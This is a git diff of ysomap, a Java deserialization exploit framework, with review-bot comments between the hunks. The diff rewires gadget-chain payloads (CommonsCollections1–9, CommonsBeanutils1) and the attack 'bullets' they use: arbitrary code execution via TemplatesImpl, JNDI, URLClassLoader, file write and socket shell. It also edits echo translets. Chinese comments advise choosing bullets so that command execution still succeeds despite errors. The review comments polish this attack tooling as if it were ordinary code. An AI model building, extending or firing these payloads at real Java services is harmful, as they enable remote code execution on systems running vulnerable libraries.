diff --git a/core/src/main/java/ysomap/bullets/collections/TransformerWithTemplatesImplBullet.java b/core/src/main/java/ysomap/bullets/collections/TransformerWithTemplatesImplBullet.java index 83fa9d5..780c4e1 100755 --- a/core/src/main/java/ysomap/bullets/collections/TransformerWithTemplatesImplBullet.java +++ b/core/src/main/java/ysomap/bullets/collections/TransformerWithTemplatesImplBullet.java @@ -10,11 +10,12 @@ /** * jdk.xml.enableTemplatesImplDeserialization=true + * 这个bullet不是很有必要 * @author wh1t3P1g * @since 2020/2/17 */ @SuppressWarnings({"rawtypes"}) -@Bullets +//@Bullets @Dependencies({"<=commons-collections 3.2.1", "<=commons-collections 4.0"}) @Details("执行后,执行任意代码,依赖TemplatesImpl") @Authors({ Authors.WH1T3P1G }) diff --git a/core/src/main/java/ysomap/bullets/jdk/TemplatesImplBullet.java b/core/src/main/java/ysomap/bullets/jdk/TemplatesImplBullet.java index 578a824..8c2e40a 100755 --- a/core/src/main/java/ysomap/bullets/jdk/TemplatesImplBullet.java +++ b/core/src/main/java/ysomap/bullets/jdk/TemplatesImplBullet.java @@ -129,6 +129,10 @@ public static class StubTransletPayload extends AbstractTranslet implements Seri private static final long serialVersionUID = -5971610431559700674L; + public StubTransletPayload(){ + transletVersion = 101; + } + public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {} @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsBeanutils1.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsBeanutils1.java index 1cfa294..c98df2a 100644 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsBeanutils1.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsBeanutils1.java @@ -10,6 +10,10 @@ import java.util.PriorityQueue; /** + * cb1的反序列化会报错 + * 所以在选用bullet的时候,尽量选取报错也不会影响执行效果的类型 + * 比如直接执行命令 + * 比如运行socket shell的bullet就不太适合了 * @author wh1t3P1g * @since 2020/5/14 */ 
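Review bot: Commenting out `@Bullets` instead of removing it leaves dead annotation text in the class header, and the added `这个bullet不是很有必要` comment is the only hint at why the class is no longer registered; the same `//@Payloads` pattern appears in the CommonsCollections1, CommonsCollections2, CommonsCollections4 and CommonsCollections6 hunks. If the intent is to keep the class for reference but stop registering it, say so where it is disabled, e.g. `// not registered: payloads now default to TransformerBullet` (the rationale is inferred from the CommonsCollections1 hunk, which swaps this bullet for TransformerBullet — confirm). Otherwise delete the annotation outright so the header reads cleanly.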
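Review bot: The literal `101` assigned to `transletVersion` in the new StubTransletPayload constructor is repeated verbatim in the SocketEchoPayload and TomcatEchoPayload hunks; a single named constant such as `private static final int TRANSLET_VERSION = 101;` would give the value a name and keep the three sites in sync. The enclosing StubTransletPayload class starts and ends outside the hunk.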
@@ -23,7 +27,12 @@ public class CommonsBeanutils1 extends AbstractPayload { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TemplatesImplBullet().set("body",args[0]); + Bullet bullet = new TemplatesImplBullet(); + bullet.set("type", args[0]); + bullet.set("body", args[1]); + bullet.set("effect", args[2]); + bullet.set("exception", args[3]); + return bullet; } @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections1.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections1.java index 64ca19a..8223b01 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections1.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections1.java @@ -5,7 +5,7 @@ import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.map.LazyMap; import ysomap.bullets.Bullet; -import ysomap.bullets.collections.TransformerWithTemplatesImplBullet; +import ysomap.bullets.collections.TransformerBullet; import ysomap.common.annotation.*; import ysomap.core.util.PayloadHelper; import ysomap.core.util.ReflectionHelper; @@ -21,10 +21,14 @@ * @since 2020/2/17 */ @SuppressWarnings({"rawtypes","unchecked"}) -@Payloads +//@Payloads @Targets({Targets.JDK}) @Authors({ Authors.FROHOFF }) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"commons-collections:commons-collections:3.2.1","jdk7"}) public class CommonsCollections1 extends AbstractPayload { 
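Review bot: The rewritten getDefaultBullet reads `args[0]` through `args[3]` with no arity check, so a caller that still passes the single `body` argument the old body took fails with a bare ArrayIndexOutOfBoundsException instead of a message; add `if (args.length < 4) throw new IllegalArgumentException("expected 4 args: type, body, effect, exception");` before the first `set`, and record the positional contract in the method Javadoc (`@param args type, body, effect, exception, in that order`). The identical five-line body is pasted into the CommonsCollections2, CommonsCollections7 and CommonsCollections9 hunks; since the original code chained `set` on the returned Bullet, this could be one chained expression or a shared helper in AbstractPayload (assuming it is the common base, as it is for the classes visible here). The enclosing class starts outside the hunk.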
@@ -35,8 +39,7 @@ public boolean checkObject(Object obj) { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TransformerWithTemplatesImplBullet() - .set("args",args[0]); + return new TransformerBullet().set("args",args[0]); } @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections2.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections2.java index 8eb2b7c..34bfb90 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections2.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections2.java @@ -17,7 +17,7 @@ * @since 2020/2/17 */ @SuppressWarnings({"rawtypes","unchecked"}) -@Payloads +//@Payloads @Targets({Targets.JDK}) @Authors({ Authors.FROHOFF }) @Require(bullets = {"TemplatesImplBullet"}, param = false) @@ -31,7 +31,12 @@ public boolean checkObject(Object obj) { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TemplatesImplBullet().set("body", args[0]); + Bullet bullet = new TemplatesImplBullet(); + bullet.set("type", args[0]); + bullet.set("body", args[1]); + bullet.set("effect", args[2]); + bullet.set("exception", args[3]); + return bullet; } @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections3.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections3.java index d640da3..5b3d0bf 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections3.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections3.java 
@@ -20,7 +20,11 @@ @Payloads @Targets({Targets.JDK}) @Authors({ Authors.FROHOFF }) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"org.apache.commons:commons-collections4:4.0"}) public class CommonsCollections3 extends CommonsCollections2 { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections4.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections4.java index b0ec5fc..81d6dd7 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections4.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections4.java @@ -43,10 +43,14 @@ https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70 */ @SuppressWarnings({"rawtypes"}) -@Payloads +//@Payloads @Targets({Targets.JDK}) @Authors({ Authors.MATTHIASKAISER, Authors.JASINNER }) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"commons-collections:commons-collections:3.2.1, without security manager"}) public class CommonsCollections4 extends AbstractPayload { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections5.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections5.java index 3a6f843..97ae82b 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections5.java 
+++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections5.java @@ -24,7 +24,11 @@ @Payloads @Targets({Targets.JDK}) @Authors({ Authors.MATTHIASKAISER }) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"commons-collections:commons-collections:3.2.1"}) public class CommonsCollections5 extends AbstractPayload { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections6.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections6.java index 45bd713..59281a8 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections6.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections6.java @@ -19,9 +19,13 @@ * @since 2020/2/18 */ @SuppressWarnings({"rawtypes","unchecked"}) -@Payloads +//@Payloads @Targets({Targets.JDK}) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"commons-collections:commons-collections:3.2.1"}) @Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI}) public class CommonsCollections6 extends AbstractPayload { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections7.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections7.java index b5da893..d011c4c 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections7.java 
+++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections7.java @@ -30,7 +30,12 @@ public boolean checkObject(Object obj) { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TemplatesImplBullet().set("body", args[0]); + Bullet bullet = new TemplatesImplBullet(); + bullet.set("type", args[0]); + bullet.set("body", args[1]); + bullet.set("effect", args[2]); + bullet.set("exception", args[3]); + return bullet; } @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections8.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections8.java index 98ea47c..8705801 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections8.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections8.java @@ -23,7 +23,11 @@ @Payloads @Targets({Targets.JDK}) @Dependencies({"commons-collections:commons-collections:3.2.1"}) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Authors({ Authors.WH1T3P1G }) public class CommonsCollections8 extends AbstractPayload { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections9.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections9.java index 76cf04f..28aa202 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections9.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections9.java 
@@ -23,7 +23,7 @@ @SuppressWarnings({"rawtypes","unchecked"}) @Payloads @Targets({Targets.JDK}) -@Dependencies({"commons-collections:commons-collections:3.2.1","for shiro"}) +@Dependencies({"commons-collections:commons-collections:3.2.1","special for shiro"}) @Require(bullets = {"TemplatesImplBullet"}, param = false) @Authors({ Authors.WH1T3P1G }) public class CommonsCollections9 extends AbstractPayload { @@ -35,7 +35,12 @@ public boolean checkObject(Object obj) { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TemplatesImplBullet().set("body", args[0]); + Bullet bullet = new TemplatesImplBullet(); + bullet.set("type", args[0]); + bullet.set("body", args[1]); + bullet.set("effect", args[2]); + bullet.set("exception", args[3]); + return bullet; } @Override diff --git a/thirdparty/src/main/java/echo/SocketEchoPayload.java b/thirdparty/src/main/java/echo/SocketEchoPayload.java index 73630af..b9f23a9 100644 --- a/thirdparty/src/main/java/echo/SocketEchoPayload.java +++ b/thirdparty/src/main/java/echo/SocketEchoPayload.java @@ -18,11 +18,11 @@ */ public class SocketEchoPayload extends AbstractTranslet implements Serializable, Runnable { - private static String host; private static int port; public SocketEchoPayload(){ + transletVersion = 101; new Thread(this).start(); } diff --git a/thirdparty/src/main/java/echo/TomcatEchoPayload.java b/thirdparty/src/main/java/echo/TomcatEchoPayload.java index af10daf..93c154a 100644 --- a/thirdparty/src/main/java/echo/TomcatEchoPayload.java +++ b/thirdparty/src/main/java/echo/TomcatEchoPayload.java @@ -15,6 +15,7 @@ public class TomcatEchoPayload extends AbstractTranslet implements Serializable { public TomcatEchoPayload() throws Exception { + transletVersion = 101; Object o; Object resp; String s;